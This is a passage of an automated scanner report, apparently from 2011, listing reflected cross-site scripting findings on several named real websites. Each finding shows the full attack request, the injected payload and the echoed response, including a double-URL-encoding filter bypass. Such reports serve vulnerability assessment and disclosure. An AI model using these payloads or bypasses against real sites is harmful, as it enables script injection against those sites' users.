The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26638'%3b4294ddce47c was submitted in the REST URL parameter 5. This input was echoed as 26638';4294ddce47c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/05/01/284126638'%3b4294ddce47c/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:07 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54591


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/284126638';4294ddce47c/N';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...
7.138. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2841/N

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 38226<img%20src%3da%20onerror%3dalert(1)>ac631b92e88 was submitted in the REST URL parameter 5. This input was echoed as 38226<img src=a onerror=alert(1)>ac631b92e88 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/284138226<img%20src%3da%20onerror%3dalert(1)>ac631b92e88/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:10 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 55865


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
< 284138226<img src=a onerror=alert(1)>ac631b92e88 and
site_url LIKE 'N' ORDER BY `report_date` DESC LIMIT 2 </p>
...[SNIP]...
7.139. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2841/N

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a354b"><img%20src%3da%20onerror%3dalert(1)>cfb2573f01d was submitted in the REST URL parameter 5. This input was echoed as a354b"><img src=a onerror=alert(1)>cfb2573f01d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2841a354b"><img%20src%3da%20onerror%3dalert(1)>cfb2573f01d/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:06 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 56035


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/05/01/2841a354b"><img src=a onerror=alert(1)>cfb2573f01d/N" title="SEO Quotient for ">
...[SNIP]...
7.140. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2841/N

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ec04'%3b0a71d25a67d was submitted in the REST URL parameter 6. This input was echoed as 2ec04';0a71d25a67d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/05/01/2841/N2ec04'%3b0a71d25a67d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:32 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54542


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/05/01/2841/N2ec04';0a71d25a67d';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...
7.141. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2841/N

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8e883<img%20src%3da%20onerror%3dalert(1)>6de707698a9 was submitted in the REST URL parameter 6. This input was echoed as 8e883<img src=a onerror=alert(1)>6de707698a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2841/N8e883<img%20src%3da%20onerror%3dalert(1)>6de707698a9 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:37 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:37 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<img src=a onerror=alert(1)>6de707698a9" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/05/01/2841/N8e883<img src=a onerror=alert(1)>6de707698a9ddd</a>
...[SNIP]...
7.142. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2841/N

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b4eb"><img%20src%3da%20onerror%3dalert(1)>111f2913bfc was submitted in the REST URL parameter 6. This input was echoed as 8b4eb"><img src=a onerror=alert(1)>111f2913bfc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/05/01/2841/N8b4eb"><img%20src%3da%20onerror%3dalert(1)>111f2913bfc HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:31 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:32 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/05/01/2841/N8b4eb"><img src=a onerror=alert(1)>111f2913bfc" title="SEO Quotient for ">
...[SNIP]...
7.143. http://www.seoq.com/webstatshq/www.onlinemicrofiche.com [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /webstatshq/www.onlinemicrofiche.com

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38b60"style%3d"x%3aexpression(alert(1))"d66771aed6f was submitted in the REST URL parameter 2. This input was echoed as 38b60"style="x:expression(alert(1))"d66771aed6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /webstatshq/www.onlinemicrofiche.com38b60"style%3d"x%3aexpression(alert(1))"d66771aed6f HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:13:47 GMT
Server: Apache
Set-Cookie: PHPSESSID=um5u5c0a1mc9cgem5l60jo9i27; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 34825

angInfo('Cat keywords')));

?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<meta name="description" content="onlinemicrofiche.com38b60"style="x:expression(alert(1))"d66771aed6f on sites like " />
...[SNIP]...
7.144. http://bdv.bidvertiser.com/BidVertiser.dbm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bdv.bidvertiser.com
Path:   /BidVertiser.dbm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a2dd'-alert(1)-'3b6a11685b8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /BidVertiser.dbm?pid=349166&bid=862453 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: bdv.bidvertiser.com
Referer: http://www.google.com/search?hl=en&q=6a2dd'-alert(1)-'3b6a11685b8

Response

HTTP/1.1 200 OK
Date: Monday, 02-May-2011 02:35:12 GMT
Cache-Control: no-store
Last-Modified: Sunday, 02-May-2010 02:35:12 GMT
P3P: policyref="http://www.bidvertiser.com/bdv/bidvertiser/p3p.xml", CP="NOI DEV PSA PSD IVA OTP OUR OTR IND OTC"
Content-Type: text/html; charset=ISO-8859-1
Content-Len: 1523
Warning: 214 "Juniper Networks DX Active"
Vary: Accept-Encoding, User-Agent
Content-Length: 1523


try
{
tref=1;
win_name='null';
report_error=0;
docref='';
try
{
if (window.top.location=='') aa=1;
docref=document.referrer;
}
catch(er)
{
report_error=1;
docref='none';
}
if (report_err
...[SNIP]...
_frame='ifr' + 'ame' + ' name="BidVertiser_Frame"' + ' src="http://bdv.bidvertiser.com/bidvertiser.dbm?pid=349166&bid=862453&RD=45&DIF=1' + '&bd_ref_v=' + escape('http://www.google.com/search?hl=en&q=6a2dd'-alert(1)-'3b6a11685b8') + '&tref=' + tref + '&win_name=' + win_name + '&docref=' + docref + '&jsrand=' + jsrand + '&js1loc=' + escape(window.location.href) + '"' + ' width=468 ' + ' height=60 ' + ' marginwidth="0" ' + ' m
...[SNIP]...
7.145. http://s28.sitemeter.com/js/counter.asp [IP cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s28.sitemeter.com
Path:   /js/counter.asp

Issue detail

The value of the IP cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 152b9"%3balert(1)//74ef2e7ad98 was submitted in the IP cookie. This input was echoed as 152b9";alert(1)//74ef2e7ad98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /js/counter.asp?site=s28japanator HTTP/1.1
Host: s28.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IP=173%2E193%2E214%2E243152b9"%3balert(1)//74ef2e7ad98

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 02:06:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7294
Content-Type: application/x-javascript
Expires: Mon, 02 May 2011 02:16:53 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServerName;
       SiteMeter.SecurityCode = sSecurityCode;
       SiteMeter.IP = "173.193.214.243152b9";alert(1)//74ef2e7ad98";
       SiteMeter.trackingImage = new Image();
       SiteMeter.dgOutlinkImage = new Image();

       if (typeof(g_sLastCodeName) != 'undefined')
           if (g_sLastCodeName == sCodeName)
               return;

       SiteMete
...[SNIP]...
7.146. http://s28.sitemeter.com/js/counter.js [IP cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s28.sitemeter.com
Path:   /js/counter.js

Issue detail

The value of the IP cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6e88"%3balert(1)//e83db7807b was submitted in the IP cookie. This input was echoed as c6e88";alert(1)//e83db7807b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /js/counter.js?site=s28japanator HTTP/1.1
Host: s28.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IP=173%2E193%2E214%2E243c6e88"%3balert(1)//e83db7807b

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 02:06:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7293
Content-Type: application/x-javascript
Expires: Mon, 02 May 2011 02:16:50 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServerName;
       SiteMeter.SecurityCode = sSecurityCode;
       SiteMeter.IP = "173.193.214.243c6e88";alert(1)//e83db7807b";
       SiteMeter.trackingImage = new Image();
       SiteMeter.dgOutlinkImage = new Image();

       if (typeof(g_sLastCodeName) != 'undefined')
           if (g_sLastCodeName == sCodeName)
               return;

       SiteMete
...[SNIP]...
7.147. http://www.a-m-7.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.a-m-7.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c02da%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed81d56a3b9c was submitted in the REST URL parameter 1. This input was echoed as c02da"><script>alert(1)</script>d81d56a3b9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.icoc02da%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed81d56a3b9c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.a-m-7.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Mon, 02 May 2011 00:28:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash02
X-AspNet-Version: 2.0.50727
Content-Length: 203
Location: http://www.amateurmatch.com/favicon.icoc02da"><script>alert(1)</script>d81d56a3b9c
Cache-Control: private
Content-Type: text/html

<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://www.amateurmatch.com/favicon.icoc02da"><script>alert(1)</script>d81d56a3b9c">here</a>.</body
...[SNIP]...
7.148. http://www.a-m-7.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.a-m-7.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b831e"><script>alert(1)</script>99020df904c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?b831e"><script>alert(1)</script>99020df904c=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.a-m-7.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Mon, 02 May 2011 00:28:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash02
X-AspNet-Version: 2.0.50727
Content-Length: 206
Location: http://www.amateurmatch.com/favicon.ico?b831e"><script>alert(1)</script>99020df904c=1
Cache-Control: private
Content-Type: text/html

<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://www.amateurmatch.com/favicon.ico?b831e"><script>alert(1)</script>99020df904c=1">here</a>.</b
...[SNIP]...
7.149. http://www.aiu-online.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aiu-online.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7aacd"><script>alert(1)</script>585d6f184ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?7aacd"><script>alert(1)</script>585d6f184ff=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aiu-online.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 02 May 2011 00:08:54 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 263
Location: http://www.aiuonline.edu/favicon.ico?7aacd"><script>alert(1)</script>585d6f184ff=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.aiuonline.edu/favicon.ico?7aacd"><script>alert(1)</script>585d6f184ff=1">http://www.aiuonline.edu/favicon.ico?
...[SNIP]...
7.150. http://www.aiu-online.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aiu-online.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 64030<script>alert(1)</script>ba29df295d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?64030<script>alert(1)</script>ba29df295d9=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aiu-online.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 02 May 2011 00:08:54 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 259
Location: http://www.aiuonline.edu/favicon.ico?64030<script>alert(1)</script>ba29df295d9=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.aiuonline.edu/favicon.ico?64030<script>alert(1)</script>ba29df295d9=1">http://www.aiuonline.edu/favicon.ico?64030<script>alert(1)</script>ba29df295d9=1</a>
...[SNIP]...
7.151. http://www.upmc.edu/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.upmc.edu
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6476a"><script>alert(1)</script>b938a207577 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?6476a"><script>alert(1)</script>b938a207577=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.upmc.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Found
Date: Sun, 01 May 2011 23:30:27 GMT
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6520
X-Powered-By: ASP.NET
Location: http://upmc.com/?6476a"><script>alert(1)</script>b938a207577=1
Content-Length: 248
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1><p>The document has moved <a href="http://upmc.com/?6476a"><script>alert(1)</script>b938a207577=1">
...[SNIP]...
8. Flash cross-domain policy  previous  next
There are 127 instances of this issue:

8.1. http://0.gravatar.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://0.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 0.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: application/xml
Date: Mon, 02 May 2011 02:47:03 GMT
Expires: Mon, 02 May 2011 02:52:03 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: ECS (dca/532A)
X-Cache: HIT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
